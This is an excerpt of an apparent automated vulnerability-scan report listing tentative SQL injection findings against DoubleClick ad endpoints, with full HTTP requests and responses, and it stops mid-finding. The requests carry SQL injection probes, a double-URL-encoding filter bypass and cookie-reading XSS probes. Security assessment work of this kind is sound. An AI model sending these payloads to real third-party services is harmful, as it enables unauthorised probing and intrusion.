The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adi/N5875.270604.B3/B5111946.91;sz=120x600;pc=[TPAS_ID];ord=[timestamp]?&1%20and%201%3d1--%20=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0Rw6qcLcmo_34070076.html?rtbhost=rts-rr14.sldc.dataxu.net&btid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkV8ZWMxNTA4OWUtNjFiYi00Y2FmLTkzZTItNTIwNGU4NTNlZDI3fDEyOTU5MTkzNDM3NTl8MXwwRmVYbGtHVmN4fDBSdzZxY0xjbW98ODg5NTY1MzE3fA&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TT4o7gABkFsK5WfYIOdxvqDxBisV1iCr7MNZGg&euid=Q0FFU0VDSUFxLVBVbW8yVVJpZkRFMzFLLTJB&slotid=MQ&fiu=MEZlWGxrR1ZjeA&ciu=MFJ3NnFjTGNtbw&reqid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkU&ccw=SUFCMTkjMC4wfElBQjE1IzAuMHxJQUIxOSMwLjB8SUFCMTUjMC4w&epid=&bp=158&dv=&dm=&os=&scres=&gen=&age=&zc=NzUyMDc&s=http%3A%2F%2Fjoomlacode.org%2Fgf%2Fproject%2Fjoomla%2Freporting%2F&refurl=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 1049
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 25 Jan 2011 04:25:26 GMT
Expires: Tue, 25 Jan 2011 04:25:26 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,009 Template Name = Image Banner - Open in New Window -
...[SNIP]...
<a href="http://ad.doubleclick.net/click%3Bh%3Dv8/3a9a/3/0/%2a/b%3B233909482%3B1-0%3B0%3B58746736%3B933-120/600%3B38657313/38675070/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://t.mookie1.com/t/v1/clk?migAgencyId=111&migSource=adsrv2&migTrackDataExt=2356384;58746736;233909482;38657313&migRandom=3942724&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.dominos.com/&utm_source=Banner&utm_medium=DPZ_Mbanner&utm_content=NoPromo&utm_campaign=MindshareBanner" target="_blank">
<img width="120" height="600" border="0" src="http://s0.2mdn.net/2356384/2-N7_Specialty_120x600.jpg">
</a>
<img src="http://t.mookie1.com/t/v1/imp?%25&migAgencyId=111&migSource=adsrv2&migTrackDataExt=2356384;58746736;233909482;38657313&migRandom=3942724&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" />
</body></html>

Request 2

GET /adi/N5875.270604.B3/B5111946.91;sz=120x600;pc=[TPAS_ID];ord=[timestamp]?&1%20and%201%3d2--%20=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0Rw6qcLcmo_34070076.html?rtbhost=rts-rr14.sldc.dataxu.net&btid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkV8ZWMxNTA4OWUtNjFiYi00Y2FmLTkzZTItNTIwNGU4NTNlZDI3fDEyOTU5MTkzNDM3NTl8MXwwRmVYbGtHVmN4fDBSdzZxY0xjbW98ODg5NTY1MzE3fA&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TT4o7gABkFsK5WfYIOdxvqDxBisV1iCr7MNZGg&euid=Q0FFU0VDSUFxLVBVbW8yVVJpZkRFMzFLLTJB&slotid=MQ&fiu=MEZlWGxrR1ZjeA&ciu=MFJ3NnFjTGNtbw&reqid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkU&ccw=SUFCMTkjMC4wfElBQjE1IzAuMHxJQUIxOSMwLjB8SUFCMTUjMC4w&epid=&bp=158&dv=&dm=&os=&scres=&gen=&age=&zc=NzUyMDc&s=http%3A%2F%2Fjoomlacode.org%2Fgf%2Fproject%2Fjoomla%2Freporting%2F&refurl=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 1118
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 25 Jan 2011 04:25:26 GMT
Expires: Tue, 25 Jan 2011 04:25:26 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,009 Template Name = Image Banner - Open in New Window -
...[SNIP]...
<a href="http://ad.doubleclick.net/click%3Bh%3Dv8/3a9a/3/0/%2a/e%3B233909482%3B0-0%3B0%3B58746736%3B933-120/600%3B37406893/37424770/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://t.mookie1.com/t/v1/clk?migAgencyId=111&migSource=adsrv2&migTrackDataExt=2356384;58746736;233909482;37406893&migRandom=3942755&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://express.dominos.com/pages/track.jsp?target=promocode&promocode=BANNQ7WN3&utm_source=Banner&utm_medium=DPZ_Mbanner&utm_content=ban_BANNQ7WN3&utm_campaign=MindshareBanner" target="_blank">
<img width="120" height="600" border="0" src="http://s0.2mdn.net/2356384/N5_5.99_OrderThisDeal_120x600.jpg">
</a>
<img src="http://t.mookie1.com/t/v1/imp?%25&migAgencyId=111&migSource=adsrv2&migTrackDataExt=2356384;58746736;233909482;37406893&migRandom=3942755&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" />
</body></html>

1.2. http://ad.doubleclick.net/adi/N5875.270604.B3/B5111946.91 [sz parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adi/N5875.270604.B3/B5111946.91

Issue detail

The sz parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the sz parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adi/N5875.270604.B3/B5111946.91;sz=120x600;pc=[TPAS_ID];ord=[timestamp]?'%20and%201%3d1--%20 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0Rw6qcLcmo_34070076.html?rtbhost=rts-rr14.sldc.dataxu.net&btid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkV8ZWMxNTA4OWUtNjFiYi00Y2FmLTkzZTItNTIwNGU4NTNlZDI3fDEyOTU5MTkzNDM3NTl8MXwwRmVYbGtHVmN4fDBSdzZxY0xjbW98ODg5NTY1MzE3fA&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TT4o7gABkFsK5WfYIOdxvqDxBisV1iCr7MNZGg&euid=Q0FFU0VDSUFxLVBVbW8yVVJpZkRFMzFLLTJB&slotid=MQ&fiu=MEZlWGxrR1ZjeA&ciu=MFJ3NnFjTGNtbw&reqid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkU&ccw=SUFCMTkjMC4wfElBQjE1IzAuMHxJQUIxOSMwLjB8SUFCMTUjMC4w&epid=&bp=158&dv=&dm=&os=&scres=&gen=&age=&zc=NzUyMDc&s=http%3A%2F%2Fjoomlacode.org%2Fgf%2Fproject%2Fjoomla%2Freporting%2F&refurl=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 1055
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 25 Jan 2011 04:25:25 GMT
Expires: Tue, 25 Jan 2011 04:25:25 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,009 Template Name = Image Banner - Open in New Window -
...[SNIP]...
<a href="http://ad.doubleclick.net/click%3Bh%3Dv8/3a9a/3/0/%2a/o%3B233909482%3B2-0%3B0%3B58746736%3B933-120/600%3B40379675/40397462/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://t.mookie1.com/t/v1/clk?migAgencyId=111&migSource=adsrv2&migTrackDataExt=2356384;58746736;233909482;40379675&migRandom=3941709&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.dominos.com/&utm_source=Banner&utm_medium=DPZ_Mbanner&utm_content=NoPromo&utm_campaign=MindshareBanner" target="_blank">
<img width="120" height="600" border="0" src="http://s0.2mdn.net/2356384/1-Zeus_Dom_SuperBowl_120x600.gif">
</a>
<img src="http://t.mookie1.com/t/v1/imp?%25&migAgencyId=111&migSource=adsrv2&migTrackDataExt=2356384;58746736;233909482;40379675&migRandom=3941709&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" />
</body></html>

Request 2

GET /adi/N5875.270604.B3/B5111946.91;sz=120x600;pc=[TPAS_ID];ord=[timestamp]?'%20and%201%3d2--%20 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0Rw6qcLcmo_34070076.html?rtbhost=rts-rr14.sldc.dataxu.net&btid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkV8ZWMxNTA4OWUtNjFiYi00Y2FmLTkzZTItNTIwNGU4NTNlZDI3fDEyOTU5MTkzNDM3NTl8MXwwRmVYbGtHVmN4fDBSdzZxY0xjbW98ODg5NTY1MzE3fA&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TT4o7gABkFsK5WfYIOdxvqDxBisV1iCr7MNZGg&euid=Q0FFU0VDSUFxLVBVbW8yVVJpZkRFMzFLLTJB&slotid=MQ&fiu=MEZlWGxrR1ZjeA&ciu=MFJ3NnFjTGNtbw&reqid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkU&ccw=SUFCMTkjMC4wfElBQjE1IzAuMHxJQUIxOSMwLjB8SUFCMTUjMC4w&epid=&bp=158&dv=&dm=&os=&scres=&gen=&age=&zc=NzUyMDc&s=http%3A%2F%2Fjoomlacode.org%2Fgf%2Fproject%2Fjoomla%2Freporting%2F&refurl=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 1118
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 25 Jan 2011 04:25:25 GMT
Expires: Tue, 25 Jan 2011 04:25:25 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,009 Template Name = Image Banner - Open in New Window -
...[SNIP]...
<a href="http://ad.doubleclick.net/click%3Bh%3Dv8/3a9a/3/0/%2a/e%3B233909482%3B0-0%3B0%3B58746736%3B933-120/600%3B37406893/37424770/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://t.mookie1.com/t/v1/clk?migAgencyId=111&migSource=adsrv2&migTrackDataExt=2356384;58746736;233909482;37406893&migRandom=3941771&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://express.dominos.com/pages/track.jsp?target=promocode&promocode=BANNQ7WN3&utm_source=Banner&utm_medium=DPZ_Mbanner&utm_content=ban_BANNQ7WN3&utm_campaign=MindshareBanner" target="_blank">
<img width="120" height="600" border="0" src="http://s0.2mdn.net/2356384/N5_5.99_OrderThisDeal_120x600.jpg">
</a>
<img src="http://t.mookie1.com/t/v1/imp?%25&migAgencyId=111&migSource=adsrv2&migTrackDataExt=2356384;58746736;233909482;37406893&migRandom=3941771&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" />
</body></html>

1.3. http://googleads.g.doubleclick.net/pagead/ads [frm parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The frm parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the frm parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the frm request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /pagead/ads?client=ca-pub-6071864913982699&format=336x280_as&output=html&h=280&w=336&lmt=1295924961&alternate_ad_url=http%3A%2F%2Fwww.stands4.com%2Falternate.html&color_bg=FFFFFF&color_border=FFFFFF&color_link=000055&color_text=000000&color_url=550000&flash=10.1.103&url=http%3A%2F%2Fwww.abbreviations.com%2Fbs.aspx%3Fst%3Db1.aspx51536%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E7a00ceef170%26SE%3D3%26r%3D1&dt=1295903361302&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295903361405&frm=0%2527&adk=1370815790&ga_vid=1564661048.1295903333&ga_sid=1295903333&ga_hid=302104693&ga_fc=1&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1155&bih=1012&eid=30143102&ref=http%3A%2F%2Fburp%2Fshow%2F32&fu=0&ifi=1&dtd=126&xpc=ffdvLBmcAw&p=http%3A//www.abbreviations.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.abbreviations.com/bs.aspx?st=b1.aspx51536%3Cscript%3Ealert(document.cookie)%3C/script%3E7a00ceef170&SE=3&r=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 24 Jan 2011 22:12:39 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 13853

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#000055;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
wdCUzRWFsZXJ0KGRvY3VtZW50LmNvb2tpZSklM0Mvc2NyaXB0JTNFN2EwMGNlZWYxNzAmU0U9MyZyPTGoAwHIAxfoA8IE6AO0BfUDIAAAQA&num=4&sig=AGiWqtw2HA7p7UcuLOZQ1ROSxD-tGTYiiQ&client=ca-pub-6071864913982699&adurl=http://www.errorteck.com id=aw3 onclick="ha('aw3')" onfocus="ss('','aw3')" onmousedown="st('aw3')" onmouseover="return ss('','aw3')" target=_top title="www.ErrorTeck.com">
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-6071864913982699&format=336x280_as&output=html&h=280&w=336&lmt=1295924961&alternate_ad_url=http%3A%2F%2Fwww.stands4.com%2Falternate.html&color_bg=FFFFFF&color_border=FFFFFF&color_link=000055&color_text=000000&color_url=550000&flash=10.1.103&url=http%3A%2F%2Fwww.abbreviations.com%2Fbs.aspx%3Fst%3Db1.aspx51536%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E7a00ceef170%26SE%3D3%26r%3D1&dt=1295903361302&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295903361405&frm=0%2527%2527&adk=1370815790&ga_vid=1564661048.1295903333&ga_sid=1295903333&ga_hid=302104693&ga_fc=1&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1155&bih=1012&eid=30143102&ref=http%3A%2F%2Fburp%2Fshow%2F32&fu=0&ifi=1&dtd=126&xpc=ffdvLBmcAw&p=http%3A//www.abbreviations.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.abbreviations.com/bs.aspx?st=b1.aspx51536%3Cscript%3Ealert(document.cookie)%3C/script%3E7a00ceef170&SE=3&r=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 24 Jan 2011 22:12:40 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 13999

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#000055;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...

1.4. http://googleads.g.doubleclick.net/pagead/ads [ga_hid parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The ga_hid parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ga_hid parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /pagead/ads?client=ca-pub-6071864913982699&format=336x280_as&output=html&h=280&w=336&lmt=1295924961&alternate_ad_url=http%3A%2F%2Fwww.stands4.com%2Falternate.html&color_bg=FFFFFF&color_border=FFFFFF&color_link=000055&color_text=000000&color_url=550000&flash=10.1.103&url=http%3A%2F%2Fwww.abbreviations.com%2Fbs.aspx%3Fst%3Db1.aspx51536%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E7a00ceef170%26SE%3D3%26r%3D1&dt=1295903361302&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295903361405&frm=0&adk=1370815790&ga_vid=1564661048.1295903333&ga_sid=1295903333&ga_hid=302104693'&ga_fc=1&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1155&bih=1012&eid=30143102&ref=http%3A%2F%2Fburp%2Fshow%2F32&fu=0&ifi=1&dtd=126&xpc=ffdvLBmcAw&p=http%3A//www.abbreviations.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.abbreviations.com/bs.aspx?st=b1.aspx51536%3Cscript%3Ealert(document.cookie)%3C/script%3E7a00ceef170&SE=3&r=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 24 Jan 2011 22:14:49 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 13686

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#000055;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
wdCUzRWFsZXJ0KGRvY3VtZW50LmNvb2tpZSklM0Mvc2NyaXB0JTNFN2EwMGNlZWYxNzAmU0U9MyZyPTGoAwHIAxfoA8IE6AO0BfUDIAAAQA&num=3&sig=AGiWqtxsXNzlLOrPb9U-w2HQFE7s4iob6Q&client=ca-pub-6071864913982699&adurl=http://www.errorteck.com id=aw2 onclick="ha('aw2')" onfocus="ss('','aw2')" onmousedown="st('aw2')" onmouseover="return ss('','aw2')" target=_top title="www.ErrorTeck.com">
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-6071864913982699&format=336x280_as&output=html&h=280&w=336&lmt=1295924961&alternate_ad_url=http%3A%2F%2Fwww.stands4.com%2Falternate.html&color_bg=FFFFFF&color_border=FFFFFF&color_link=000055&color_text=000000&color_url=550000&flash=10.1.103&url=http%3A%2F%2Fwww.abbreviations.com%2Fbs.aspx%3Fst%3Db1.aspx51536%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E7a00ceef170%26SE%3D3%26r%3D1&dt=1295903361302&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295903361405&frm=0&adk=1370815790&ga_vid=1564661048.1295903333&ga_sid=1295903333&ga_hid=302104693''&ga_fc=1&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1155&bih=1012&eid=30143102&ref=http%3A%2F%2Fburp%2Fshow%2F32&fu=0&ifi=1&dtd=126&xpc=ffdvLBmcAw&p=http%3A//www.abbreviations.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.abbreviations.com/bs.aspx?st=b1.aspx51536%3Cscript%3Ealert(document.cookie)%3C/script%3E7a00ceef170&SE=3&r=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 24 Jan 2011 22:14:50 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 14224

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#000055;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...

1.5. http://googleads.g.doubleclick.net/pagead/ads [h parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The h parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the h parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the h request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /pagead/ads?client=ca-pub-3737471162188127&output=html&h=600%2527&slotname=3414113612&w=160&ea=0&flash=10.1.103&url=http%3A%2F%2Fwww.beirut.com%2Fcss%2Fblue%2F4429e%252527%25253balert%252528document.cookie%252529%25252f%25252f59f8c7185c5%2Fsearch-btn.gif&dt=1295922041953&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295922041995&frm=1&adk=1261819541&ga_vid=478840491.1295922042&ga_sid=1295922042&ga_hid=1179528252&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3522672927&fu=0&ifi=1&dtd=287 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://d1.openx.org/afr.php?n=a2bb8a70&zoneid=121960&target=_blank&cb=416587824
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Tue, 25 Jan 2011 03:03:33 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 7952

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on
...[SNIP]...
h"];if(x && x.description){var pVF=x.description;var y=pVF.indexOf("Flash ")+6;pVM=pVF.substring(y,pVF.indexOf(".",y));}}
else if (window.ActiveXObject && window.execScript){
window.execScript('on error resume next\npVM=2\ndo\npVM=pVM+1\nset swControl = CreateObject("ShockwaveFlash.ShockwaveFlash."&pVM)\nloop while Err = 0\nOn Error Resume Next\npVM=pVM-1\nSub '+DCid+'_FSCommand(ByVal command, ByVal
...[SNIP]...

Request 2

